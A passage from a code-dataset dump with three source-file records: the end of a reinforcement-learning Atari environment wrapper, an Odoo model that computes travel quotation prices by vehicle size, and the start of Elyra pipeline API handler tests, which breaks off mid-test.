self._obs_add(obs)\r\n no_op = random.randint(1, self.cf.no_op_max - 1)\r\n s, r, d = self.act(0, no_op)\r\n if d:\r\n return self.reset()\r\n for i in range(self.cf.history_length):\r\n self.history.add(s)\r\n return s\r\n\r\n def act(self, action, action_repeat=None, is_training=True):\r\n if action_repeat == None:\r\n action_repeat = self.cf.action_repeat\r\n start_lives = self.lives\r\n total_r = 0\r\n for i in range(action_repeat):\r\n obs, r, d, info = self.env.step(action)\r\n s = self._obs_add(obs)\r\n self.real_done = d\r\n total_r += r\r\n \r\n if is_training:\r\n if self.lives < start_lives:\r\n d = True\r\n # if self.game == 'Pong' and r == -1:\r\n # d = True\r\n if d:\r\n break\r\n\r\n self.history.add(s)\r\n return s, total_r, d\r\n\r\n def sample_action(self):\r\n return self.env.action_space.sample()\r\n\r\n def close(self):\r\n return self.env.close()\r\n\r\n def _obs_add(self, obs):\r\n self._obs[0] = self._obs[1]\r\n self._obs[1] = obs\r\n state = np.max(self._obs, axis=0)\r\n\r\n state = cv2.resize(cv2.cvtColor(state, cv2.COLOR_RGB2GRAY), tuple(self.cf.state_shape), interpolation=cv2.INTER_AREA)\r\n return (state/255.).astype(self.cf.state_dtype)\r\n\r\n @property\r\n def lives(self):\r\n return self.env.env.ale.lives()\r\n\r\n @property\r\n def recent_states(self):\r\n return self.history.get()\r\n\r\n\r\n\r\ndef env_work_thread(remote, par_remote, config):\r\n env = Env(config)\r\n try:\r\n while True:\r\n cmd, data = par_remote.get()\r\n if cmd == 'reset':\r\n env.reset()\r\n remote.put_nowait(env.recent_states[0])\r\n elif cmd == 'act':\r\n s, r, d = env.act(data)\r\n real_done = env.real_done\r\n if d:\r\n env.reset()\r\n remote.put_nowait((env.recent_states[0], r, d, real_done))\r\n elif cmd == 'close':\r\n break\r\n elif cmd == 'render':\r\n env.env.render()\r\n else:\r\n raise NotImplementedError\r\n except Exception as e:\r\n print(e)\r\n finally:\r\n env.close()\r\n\r\nclass MultiEnv_thread(object):\r\n def __init__(self, config):\r\n print('MultiEnv_thread')\r\n self.cf = config\r\n nenvs = self.cf.nenvs\r\n self.remotes, self.work_remotes = zip(*[[Queue(1), Queue(1)] for i in range(nenvs)])\r\n self.ps = [Thread(target=env_work_thread, args=(wr, r, self.cf)) \\\r\n for (wr, r) in zip(self.work_remotes, self.remotes)]\r\n for p in self.ps:\r\n p.daemon = True\r\n p.start()\r\n time.sleep(1)\r\n\r\n def reset(self):\r\n for r in self.remotes:\r\n r.put_nowait(('reset', None))\r\n results = [remote.get() for remote in self.work_remotes]\r\n s = results\r\n return np.stack(s)\r\n\r\n def act(self, actions):\r\n for remote, action in zip(self.remotes, actions):\r\n remote.put_nowait(('act', action))\r\n results = [remote.get() for remote in self.work_remotes]\r\n s, r, d, real_done = zip(*results)\r\n return np.stack(s), np.stack(r), np.stack(d), np.stack(real_done)\r\n\r\n def render(self):\r\n for r in self.remotes: \r\n r.put_nowait(('render', None))\r\n\r\n def close(self):\r\n for r in self.remotes: \r\n r.put_nowait(('close', None))\r\n for p in self.ps:\r\n p.join()\r\n\r\n\r\n","repo_name":"wxw0/rl","sub_path":"a2c/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30334694985","text":"from odoo import models, fields, api, exceptions\nfrom ..tools.performance import timer\n\n\nclass AsianSpreadsheetOption(models.Model):\n _name = 'asian.spreadsheet.option'\n _description = 'Asian Spreadsheet Option'\n\n name = fields.Char(string='Option')\n profit = fields.Float(string='Lợi nhuận', help='Điền vào lợi nhuận. Eg: 100.000')\n percent_profit = fields.Float(string='Lợi nhuận (%)', help='Điền vào % lợi nhuận. Eg: 25')\n car_4 = fields.Float(string='Xe 4 chỗ', compute='_compute_car_4', store=True)\n car_7 = fields.Float(string='Xe 7 chỗ', compute='_compute_car_7', store=True)\n car_16 = fields.Float(string='Xe 16 chỗ (6)', compute='_compute_car_16', store=True)\n car_29 = fields.Float(string='Xe 29 chỗ (10)', compute='_compute_car_29', store=True)\n car_35 = fields.Float(string='Xe 35 chỗ (15)', compute='_compute_car_35', store=True)\n car_45_1 = fields.Float(string='Xe 45 chỗ (21)', compute='_compute_car_45_1', store=True)\n car_45_2 = fields.Float(string='Xe 45 chỗ (25)', compute='_compute_car_45_2', store=True)\n car_45_3 = fields.Float(string='Xe 45 chỗ (30)', compute='_compute_car_45_3', store=True)\n car_45_4 = fields.Float(string='Xe 45 chỗ', compute='_compute_car_45_4', store=True)\n single_supp = fields.Float(string='Single Supp', compute='_compute_single_supp', store=True)\n apply = fields.Boolean(string='Tính báo giá')\n is_selected = fields.Boolean(string='Đã tạo Tour', compute='_compute_is_selected', store=True)\n asian_quotation_id = fields.Many2one(string='Asian Quotation', comodel_name='asian.quotation', ondelete='cascade')\n asian_quotation_schedule_ids = fields.One2many(string='Asian Quotation Schedule', comodel_name='asian.quotation.schedule', inverse_name='asian_spreadsheet_option_id')\n asian_spreadsheet_product_ids = fields.One2many(string='Asian Spreadsheet Product', comodel_name='asian.spreadsheet.product', inverse_name='asian_spreadsheet_option_id')\n asian_spreadsheet_team_option_ids = fields.One2many(string='Asian Spreadsheet Team Option', comodel_name='asian.spreadsheet.team.option', inverse_name='asian_spreadsheet_option_id')\n asian_spreadsheet_net_option_ids = fields.One2many(string='Asian Spreadsheet Net Option', comodel_name='asian.spreadsheet.net.option', inverse_name='asian_spreadsheet_option_id')\n asian_spreadsheet_abroad_ids = fields.One2many(string='Asian Spreadsheet Abroad', comodel_name='asian.spreadsheet.abroad', inverse_name='asian_spreadsheet_option_id')\n template_option_id = fields.Many2one(string='Template Option', comodel_name='asian.spreadsheet.option', domain=\"[('id', 'in', domain_template_option_ids)]\")\n domain_template_option_ids = fields.Many2many(comodel_name='asian.spreadsheet.option', compute='_compute_domain_template_option_ids')\n\n @api.onchange('apply')\n def onchange_apply(self):\n if len(self.asian_quotation_id.asian_spreadsheet_option_ids.filtered(lambda o: o.apply)) > 2:\n raise exceptions.ValidationError(\"Không thể tính báo giá nhiều dòng!\")\n\n def create_quotation_schedule(self):\n self.ensure_one()\n for line in self.asian_quotation_id.asian_quotation_schedule_ids:\n self.env['asian.quotation.schedule'].create({\n 'sequence': line.sequence,\n 'schedule_date': line.schedule_date,\n 'schedule_act': line.schedule_act,\n 'note': line.note,\n 'customer_market': line.customer_market,\n 'validate_season': line.validate_season,\n 'meal_supplied': line.meal_supplied,\n 'schedule_date_date': line.schedule_date_date,\n 'weekday': line.weekday,\n 'meal_ids': [(6, 0, line.meal_ids.ids)],\n 'template_id': line.template_id,\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n 'x_day': line.x_day,\n })\n\n def create_spreadsheet_product(self):\n self.ensure_one()\n for line in self.asian_quotation_id.asian_spreadsheet_product_ids:\n self.env['asian.spreadsheet.product'].create({\n 'date_number': line.date_number,\n 'travel_itinerary': line.travel_itinerary,\n 'hotel_price': line.hotel_price,\n 'meal_price': line.meal_price,\n 'ticket_price': line.ticket_price,\n 'show_price': line.show_price,\n 'transit_price': line.transit_price,\n 'transport_price': line.transport_price,\n 'guide_price': line.guide_price,\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n })\n\n def create_team_option(self):\n self.ensure_one()\n\n by_type = self.env['asian.spreadsheet.team.option'].create({\n 'name': 'Giá theo loại xe/KM',\n 'apply': True,\n 'type_line': 'by_type',\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n 'car_4': self.asian_quotation_id.price_type_car_4 or self.env.ref('asian_quotation.car_4').price,\n 'car_7': self.asian_quotation_id.price_type_car_7 or self.env.ref('asian_quotation.car_7').price,\n 'car_16': self.asian_quotation_id.price_type_car_16 or self.env.ref('asian_quotation.car_16').price,\n 'car_29': self.asian_quotation_id.price_type_car_29 or self.env.ref('asian_quotation.car_29').price,\n 'car_35': self.asian_quotation_id.price_type_car_35 or self.env.ref('asian_quotation.car_35').price,\n 'car_45_1': self.asian_quotation_id.price_type_car_45_1 or self.env.ref('asian_quotation.car_45_1').price,\n 'car_45_2': self.asian_quotation_id.price_type_car_45_2 or self.env.ref('asian_quotation.car_45_2').price,\n 'car_45_3': self.asian_quotation_id.price_type_car_45_3 or self.env.ref('asian_quotation.car_45_3').price,\n 'car_45_4': self.asian_quotation_id.price_type_car_45_4 or self.env.ref('asian_quotation.car_45_4').price,\n })\n\n by_team = self.env['asian.spreadsheet.team.option'].create({\n 'name': 'Nhóm khách',\n 'apply': True,\n 'type_line': 'by_team',\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n 'car_4': 2,\n 'car_7': 3,\n 'car_16': 6,\n 'car_29': 10,\n 'car_35': 15,\n 'car_45_1': 20,\n 'car_45_2': 25,\n 'car_45_3': 30,\n 'car_45_4': 35,\n })\n return True\n\n def create_net_option(self):\n net = self.env['asian.spreadsheet.net.option'].create({\n 'name': 'Giá NET/khách',\n 'apply': True,\n 'type_line': 'net',\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n })\n net_usd = self.env['asian.spreadsheet.net.option'].create({\n 'name': 'GIÁ NET USD',\n 'apply': True,\n 'type_line': 'net_usd',\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n })\n return True\n\n def create_spreadsheet_abroad(self):\n self.ensure_one()\n for line in self.asian_quotation_id.asian_spreadsheet_abroad_ids:\n self.env['asian.spreadsheet.abroad'].create({\n 'name': line.name,\n 'profit': line.profit,\n 'percent_profit': line.percent_profit,\n 'car_4': line.car_4,\n 'car_7': line.car_7,\n 'car_16': line.car_16,\n 'car_29': line.car_29,\n 'car_35': line.car_35,\n 'car_45_1': line.car_45_1,\n 'car_45_2': line.car_45_2,\n 'car_45_3': line.car_45_3,\n 'car_45_4': line.car_45_4,\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n })\n return True\n\n @api.model\n def create(self, values):\n res = super(AsianSpreadsheetOption, self).create(values)\n if res.apply and not self._context.get('is_asian_quotation_duplicate'):\n res.create_quotation_schedule()\n res.create_spreadsheet_product()\n res.create_team_option()\n res.create_net_option()\n res.create_spreadsheet_abroad()\n return res\n\n def write(self, values):\n res = super(AsianSpreadsheetOption, self).write(values)\n if 'apply' in values and values.get('apply'):\n apply_line = self.filtered(lambda o: o.apply)[:1]\n if apply_line and not apply_line.asian_quotation_schedule_ids:\n apply_line.create_quotation_schedule()\n if apply_line and not apply_line.asian_spreadsheet_product_ids:\n apply_line.create_spreadsheet_product()\n if apply_line and not apply_line.asian_spreadsheet_team_option_ids:\n apply_line.create_team_option()\n if apply_line and not apply_line.asian_spreadsheet_net_option_ids:\n apply_line.create_net_option()\n if apply_line and not apply_line.asian_spreadsheet_abroad_ids:\n apply_line.create_spreadsheet_abroad()\n return res\n\n def calc_car_x(self, net_usd_line, x):\n return getattr(net_usd_line, f'car_{x}') * (100 + self.percent_profit) / 100 + self.profit\n\n def net_usd_line(self):\n return self.asian_spreadsheet_net_option_ids.filtered(lambda o: o.type_line == 'net_usd')[:1]\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_4',\n )\n def _compute_car_4(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_4 = rec.calc_car_x(net_usd_line, '4')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_7',\n )\n def _compute_car_7(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_7 = rec.calc_car_x(net_usd_line, '7')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_16',\n )\n def _compute_car_16(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_16 = rec.calc_car_x(net_usd_line, '16')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_29',\n )\n def _compute_car_29(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_29 = rec.calc_car_x(net_usd_line, '29')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_35',\n )\n def _compute_car_35(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_35 = rec.calc_car_x(net_usd_line, '35')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_45_1',\n )\n def _compute_car_45_1(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_45_1 = rec.calc_car_x(net_usd_line, '45_1')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_45_2',\n )\n def _compute_car_45_2(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_45_2 = rec.calc_car_x(net_usd_line, '45_2')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_45_3',\n )\n def _compute_car_45_3(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_45_3 = rec.calc_car_x(net_usd_line, '45_3')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_45_4',\n )\n def _compute_car_45_4(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_45_4 = rec.calc_car_x(net_usd_line, '45_4')\n\n def action_copy_option(self):\n asian_quotation_schedule_ids = [(5, 0, 0)]\n asian_spreadsheet_product_ids = [(5, 0, 0)]\n asian_spreadsheet_team_option_ids = [(5, 0, 0)]\n asian_spreadsheet_net_option_ids = [(5, 0, 0)]\n asian_spreadsheet_abroad_ids = [(5, 0, 0)]\n for line in self.template_option_id.asian_quotation_schedule_ids:\n asian_quotation_schedule_ids.append(\n (0, 0, {\n 'sequence': line.sequence,\n 'schedule_date': line.schedule_date,\n 'schedule_act': line.schedule_act,\n 'note': line.note,\n 'customer_market': line.customer_market,\n 'validate_season': line.validate_season,\n 'meal_supplied': line.meal_supplied,\n 'schedule_date_date': line.schedule_date_date,\n 'weekday': line.weekday,\n 'meal_ids': [(6, 0, line.meal_ids.ids)],\n 'asian_spreadsheet_option_id': self.id,\n 'x_day': line.x_day,\n })\n )\n\n for line in self.template_option_id.asian_spreadsheet_product_ids:\n asian_spreadsheet_product_ids.append(\n (0, 0, {\n 'date_number': line.date_number,\n 'travel_itinerary': line.travel_itinerary,\n 'hotel_price': line.hotel_price,\n 'vendor_id': line.vendor_id.id,\n 'hotel_id': line.hotel_id.id,\n 'meal_price': line.meal_price,\n 'ticket_price': line.ticket_price,\n 'show_price': line.show_price,\n 'transit_price': line.transit_price,\n 'transport_price': line.transport_price,\n 'guide_price': line.guide_price,\n 'sequence': line.sequence,\n 'type_line': line.type_line,\n 'asian_quotation_id': line.asian_quotation_id.id,\n 'asian_spreadsheet_option_id': self.id,\n })\n )\n\n for line in self.template_option_id.asian_spreadsheet_team_option_ids:\n asian_spreadsheet_team_option_ids.append(\n (0, 0, {\n 'name': line.name,\n 'profit': line.profit,\n 'car_4': line.car_4,\n 'car_7': line.car_7,\n 'car_16': line.car_16,\n 'car_29': line.car_29,\n 'car_35': line.car_35,\n 'car_45_1': line.car_45_1,\n 'car_45_2': line.car_45_2,\n 'car_45_3': line.car_45_3,\n 'car_45_4': line.car_45_4,\n 'apply': line.apply,\n 'type_line': line.type_line,\n 'asian_quotation_id': line.asian_quotation_id.id,\n 'asian_spreadsheet_option_id': self.id,\n })\n )\n\n for line in self.template_option_id.asian_spreadsheet_net_option_ids:\n asian_spreadsheet_net_option_ids.append(\n (0, 0, {\n 'name': line.name,\n 'profit': line.profit,\n 'car_4': line.car_4,\n 'car_7': line.car_7,\n 'car_16': line.car_16,\n 'car_29': line.car_29,\n 'car_35': line.car_35,\n 'car_45_1': line.car_45_1,\n 'car_45_2': line.car_45_2,\n 'car_45_3': line.car_45_3,\n 'car_45_4': line.car_45_4,\n 'apply': line.apply,\n 'type_line': line.type_line,\n 'asian_quotation_id': line.asian_quotation_id.id,\n 'asian_spreadsheet_option_id': self.id,\n })\n )\n for line in self.template_option_id.asian_spreadsheet_abroad_ids:\n asian_spreadsheet_abroad_ids.append(\n (0, 0, {\n 'name': line.name,\n 'profit': line.profit,\n 'percent_profit': line.percent_profit,\n 'car_4': line.car_4,\n 'car_7': line.car_7,\n 'car_16': line.car_16,\n 'car_29': line.car_29,\n 'car_35': line.car_35,\n 'car_45_1': line.car_45_1,\n 'car_45_2': line.car_45_2,\n 'car_45_3': line.car_45_3,\n 'car_45_4': line.car_45_4,\n 'asian_quotation_id': line.asian_quotation_id.id,\n 'asian_spreadsheet_option_id': self.id,\n })\n )\n self.write({\n 'asian_quotation_schedule_ids': asian_quotation_schedule_ids,\n 'asian_spreadsheet_product_ids': asian_spreadsheet_product_ids,\n 'asian_spreadsheet_team_option_ids': asian_spreadsheet_team_option_ids,\n 'asian_spreadsheet_net_option_ids': asian_spreadsheet_net_option_ids,\n 'asian_spreadsheet_abroad_ids': asian_spreadsheet_abroad_ids,\n 'apply': self.apply,\n })\n\n @api.depends('asian_quotation_id.sale_order_ids', 'asian_quotation_id.sale_order_ids.state')\n def _compute_is_selected(self):\n for rec in self:\n rec.is_selected = bool(rec.asian_quotation_id.sale_order_ids.filtered(lambda o: o.state != 'cancel' and o.asian_spreadsheet_option_id.id == rec.id))\n\n def _compute_domain_template_option_ids(self):\n for rec in self:\n domain = []\n if type(rec.asian_quotation_id.id) == int:\n domain.append(('asian_quotation_id', '=', rec.asian_quotation_id.id))\n if type(rec.id) == int:\n domain.append(('id', '!=', rec.id))\n rec.domain_template_option_ids = domain and self.search(domain) or False\n\n @api.depends('asian_quotation_id.vat', 'asian_quotation_id.rate', 'asian_spreadsheet_product_ids', 'asian_spreadsheet_product_ids.hotel_price')\n def _compute_single_supp(self):\n for rec in self:\n hotel_price = sum(rec.asian_spreadsheet_product_ids.mapped('hotel_price')) / 2\n vat = 1 + max(0, rec.asian_quotation_id.vat) / 100\n rec.single_supp = rec.asian_quotation_id.rate and (hotel_price * 1000 * vat / rec.asian_quotation_id.rate) or 0\n","repo_name":"hippo99dev/asianwaytravel","sub_path":"asian_quotation/models/asian_spreadsheet_option.py","file_name":"asian_spreadsheet_option.py","file_ext":"py","file_size_in_byte":19013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27916169786","text":"import asyncio\nimport json\nimport os\n\nfrom conftest import KFP_COMPONENT_CACHE_INSTANCE\nimport jupyter_core\nimport pytest\nimport requests\nfrom tornado.httpclient import HTTPClientError\n\nfrom elyra.metadata.metadata import Metadata\nfrom elyra.metadata.schemaspaces import ComponentCatalogs\nfrom elyra.pipeline.parser import PipelineParser\nfrom elyra.pipeline.pipeline_constants import (\n COS_OBJECT_PREFIX,\n DISABLE_NODE_CACHING,\n ENV_VARIABLES,\n KUBERNETES_POD_ANNOTATIONS,\n KUBERNETES_POD_LABELS,\n KUBERNETES_SECRETS,\n KUBERNETES_SHARED_MEM_SIZE,\n KUBERNETES_TOLERATIONS,\n MOUNTED_VOLUMES,\n PIPELINE_DEFAULTS,\n PIPELINE_PARAMETERS,\n RUNTIME_IMAGE,\n)\nfrom elyra.pipeline.processor import PipelineProcessorManager\nfrom elyra.pipeline.runtime_type import RuntimeProcessorType\nfrom elyra.pipeline.runtime_type import RuntimeTypeResources\nfrom elyra.pipeline.validation import PipelineValidationManager\nfrom elyra.pipeline.validation import ValidationResponse\nfrom elyra.pipeline.validation import ValidationSeverity\nfrom elyra.tests.pipeline import resources\nfrom elyra.tests.util.handlers_utils import expected_http_error\n\ntry:\n import importlib.resources as pkg_resources\nexcept ImportError:\n # Try backported to PY<37 `importlib_resources`.\n import importlib_resources as pkg_resources\n\n\nCOMPONENT_CATALOG_DIRECTORY = os.path.join(jupyter_core.paths.ENV_JUPYTER_PATH[0], \"components\")\nTEST_CATALOG_NAME = \"test_handlers_catalog\"\n\n\ndef _async_return(result):\n # Helper function to return an arbitrary value when mocking awaits\n f = asyncio.Future()\n f.set_result(result)\n return f\n\n\ndef _get_resource_path(filename):\n resource_path = os.path.join(os.path.dirname(__file__), \"resources\", \"components\", filename)\n resource_path = os.path.normpath(resource_path)\n return resource_path\n\n\nasync def cli_catalog_instance(jp_fetch):\n # Create new registry instance with a single URL-based component\n # This is not a fixture because it needs to\n paths = [_get_resource_path(\"kfp_test_operator.yaml\")]\n\n instance_metadata = {\n \"description\": \"A test registry\",\n \"runtime_type\": RuntimeProcessorType.KUBEFLOW_PIPELINES.name,\n \"categories\": [\"New Components\"],\n \"paths\": paths,\n }\n instance = Metadata(\n schema_name=\"local-file-catalog\",\n name=TEST_CATALOG_NAME,\n display_name=\"New Test Catalog\",\n metadata=instance_metadata,\n )\n\n body = json.dumps(instance.to_dict())\n r = await jp_fetch(\n \"elyra\", \"metadata\", ComponentCatalogs.COMPONENT_CATALOGS_SCHEMASPACE_ID, body=body, method=\"POST\"\n )\n assert r.code == 201\n r = await jp_fetch(\"elyra\", \"metadata\", ComponentCatalogs.COMPONENT_CATALOGS_SCHEMASPACE_ID)\n assert r.code == 200\n metadata = json.loads(r.body.decode())\n assert len(metadata) >= 1\n\n\nasync def test_get_components(jp_fetch):\n # Ensure all valid components can be found\n runtime_type = RuntimeProcessorType.LOCAL\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name)\n assert response.code == 200\n payload = json.loads(response.body.decode())\n palette = json.loads(pkg_resources.read_text(resources, \"palette.json\"))\n assert payload == palette\n\n\nasync def test_get_components_runtime_name_vs_type(jp_fetch, caplog):\n # Ensure deprecation warning appears when querying endpoint with shorthand runtime name\n runtime_name = \"kfp\"\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_name)\n assert response.code == 200\n assert \"Deprecation warning: when calling endpoint\" in caplog.text\n caplog.clear()\n\n # Ensure no deprecation warning appears when using runtime type name. The type\n # is case-insensitive, e.g., a runtime type can use either lowercase 'local' or\n # uppercase 'LOCAL'\n runtime_type = RuntimeProcessorType.LOCAL # use LOCAL runtime type\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name.lower()) # fetch with 'local'\n assert response.code == 200\n assert \"Deprecation warning: when calling endpoint\" not in caplog.text\n\n\nasync def test_get_component_properties_config(jp_fetch):\n # Ensure all valid component_entry properties can be found\n runtime_type = RuntimeProcessorType.LOCAL\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name, \"notebook\", \"properties\")\n assert response.code == 200\n payload = json.loads(response.body.decode())\n\n template = pkg_resources.read_text(resources, \"generic_properties_template.jinja2\")\n template = template.replace(\"{{ component.name }}\", \"Notebook\")\n template = template.replace(\"{{ component.extensions|tojson }}\", '[\".ipynb\"]')\n template = template.replace(\"{% if elyra_owned_properties %}\", \"\")\n template = template.replace(\n \"\"\",\n {% for property in elyra_owned_properties|sort(attribute=\"property_id\") %}\n \"{{property.property_id}}\": {{ property.get_schema()|tojson }}{% if loop.index != loop|length %},{% endif %}\n {% endfor %}\n {% endif %}\"\"\",\n \"\",\n ) # remove Elyra-owned property rendering loop\n properties = json.loads(template)\n\n # Remove pipeline parameters from properties if necessary\n if not PipelineProcessorManager.instance().supports_pipeline_params(runtime_type=runtime_type):\n # Pipeline parameters are not supported and the property can be removed from the set\n properties[\"properties\"][\"component_parameters\"][\"properties\"].pop(PIPELINE_PARAMETERS, None)\n\n # Fetch Elyra-owned properties\n elyra_properties = json.loads(pkg_resources.read_text(resources, \"additional_generic_properties.json\"))\n properties[\"properties\"][\"component_parameters\"][\"properties\"].update(elyra_properties) # update property dict\n assert payload == properties\n\n\n@pytest.mark.parametrize(\"catalog_instance\", [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)\nasync def test_get_component_properties_definition(catalog_instance, jp_fetch, caplog):\n # Ensure the definition for a component can be found\n component_url = (\n \"https://raw.githubusercontent.com/elyra-ai/examples/main/component-catalog-connectors/\"\n \"kfp-example-components-connector/kfp_examples_connector/resources/download_data.yaml\"\n )\n definition = requests.get(component_url)\n\n component_id = \"elyra-kfp-examples-catalog:a08014f9252f\" # static id for the 'Download Data' example component\n\n # Test with shorthand runtime (e.g. 'kfp', 'airflow') (support to be removed in later release)\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"kfp\", component_id)\n assert response.code == 200\n payload = json.loads(response.body.decode())\n assert payload[\"content\"] == definition.text\n assert payload[\"mimeType\"] == \"text/x-yaml\"\n\n assert \"Deprecation warning\" in caplog.text\n caplog.clear()\n\n # Test with runtime type name in endpoint\n runtime_type = RuntimeProcessorType.KUBEFLOW_PIPELINES\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", runtime_type.name, component_id)\n assert response.code == 200\n payload = json.loads(response.body.decode())\n assert payload[\"content\"] == definition.text\n assert payload[\"mimeType\"] == \"text/x-yaml\"\n\n assert \"Deprecation warning\" not in caplog.text\n\n\nasync def test_runtime_types_resources(jp_fetch):\n # Ensure appropriate runtime types resources can be fetched\n response = await jp_fetch(\"elyra\", \"pipeline\", \"runtimes\", \"types\")\n assert response.code == 200\n\n resources = json.loads(response.body.decode())\n\n runtime_types = resources[\"runtime_types\"]\n assert len(runtime_types) >= 1 # We should have Local for sure\n for runtime_type_resources in runtime_types:\n assert runtime_type_resources.get(\"id\") in [\"LOCAL\", \"KUBEFLOW_PIPELINES\", \"APACHE_AIRFLOW\", \"ARGO\"]\n\n # Acquire corresponding instance and compare that results are the same\n runtime_type = RuntimeProcessorType.get_instance_by_name(runtime_type_resources.get(\"id\"))\n resources_instance = RuntimeTypeResources.get_instance_by_type(runtime_type)\n\n assert runtime_type_resources.get(\"display_name\") == resources_instance.display_name\n assert runtime_type_resources.get(\"export_file_types\") == resources_instance.export_file_types\n assert runtime_type_resources.get(\"icon\") == resources_instance.icon_endpoint\n\n\nasync def test_double_refresh(jp_fetch):\n # Ensure that attempts to refresh the component cache while another is in progress result in 409\n\n await cli_catalog_instance(jp_fetch)\n\n refresh = {\"action\": \"refresh\"}\n body = json.dumps(refresh)\n\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert response.code == 204\n with pytest.raises(HTTPClientError) as e:\n await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert expected_http_error(e, 409)\n # Give the first refresh attempt a chance to complete and try again to ensure it has\n await asyncio.sleep(2)\n response = await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert response.code == 204\n\n\nasync def test_malformed_refresh(jp_fetch):\n # Ensure that providing the endpoints with a bad body generate 400 errors.\n refresh = {\"no-action\": \"refresh\"}\n body = json.dumps(refresh)\n\n with pytest.raises(HTTPClientError) as e:\n await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert expected_http_error(e, 400)\n\n refresh = {\"action\": \"no-refresh\"}\n body = json.dumps(refresh)\n\n with pytest.raises(HTTPClientError) as e:\n await jp_fetch(\"elyra\", \"pipeline\", \"components\", \"cache\", body=body, method=\"PUT\")\n assert expected_http_error(e, 400)\n\n\nasync def test_get_pipeline_properties_definition(jp_fetch):\n runtime_list = [\"kfp\", \"airflow\", \"local\"]\n\n for runtime in runtime_list:\n response = await jp_fetch(\"elyra\", \"pipeline\", runtime, \"properties\")\n assert response.code == 200\n payload = json.loads(response.body.decode())\n # Spot check\n\n pipeline_properties = [\"name\", \"runtime\", \"description\", PIPELINE_DEFAULTS]\n assert all(prop in payload[\"properties\"] for prop in pipeline_properties)\n\n default_properties = [\n COS_OBJECT_PREFIX,\n RUNTIME_IMAGE,\n ENV_VARIABLES,\n KUBERNETES_SECRETS,\n KUBERNETES_TOLERATIONS,\n MOUNTED_VOLUMES,\n KUBERNETES_POD_ANNOTATIONS,\n KUBERNETES_POD_LABELS,\n DISABLE_NODE_CACHING,\n KUBERNETES_SHARED_MEM_SIZE,\n ]\n if runtime == \"airflow\":\n # exclude properties that are not supported by this runtime\n default_properties.remove(DISABLE_NODE_CACHING)\n default_properties.remove(KUBERNETES_SHARED_MEM_SIZE)\n assert all(\n prop in payload[\"properties\"][PIPELINE_DEFAULTS][\"properties\"] for prop in default_properties\n ), runtime\n\n\nasync def test_pipeline_success(jp_fetch, monkeypatch):\n request_body = {\"pipeline\": \"body\", \"export_format\": \"py\", \"export_path\": \"test.py\", \"overwrite\": True}\n\n # Create a response that will trigger the valid code path\n validation_response = ValidationResponse()\n\n monkeypatch.setattr(PipelineValidationManager, \"validate\", lambda x, y: _async_return(validation_response))\n monkeypatch.setattr(PipelineParser, \"parse\", lambda x, y: \"Dummy_Data\")\n monkeypatch.setattr(PipelineProcessorManager, \"export\", lambda x, y, z, aa, bb: _async_return(\"test.py\"))\n\n json_body = json.dumps(request_body)\n\n http_response = await jp_fetch(\"elyra\", \"pipeline\", \"export\", body=json_body, method=\"POST\")\n\n assert http_response.code == 201\n\n\nasync def test_pipeline_failure(jp_fetch, monkeypatch):\n request_body = {\"pipeline\": \"body\", \"export_format\": \"py\", \"export_path\": \"test.py\", \"overwrite\": True}\n\n # Create a response that will trigger the fatal code path\n bad_validation_response = ValidationResponse()\n bad_validation_response.add_message(severity=ValidationSeverity.Error, message_type=\"invalidJSON\", 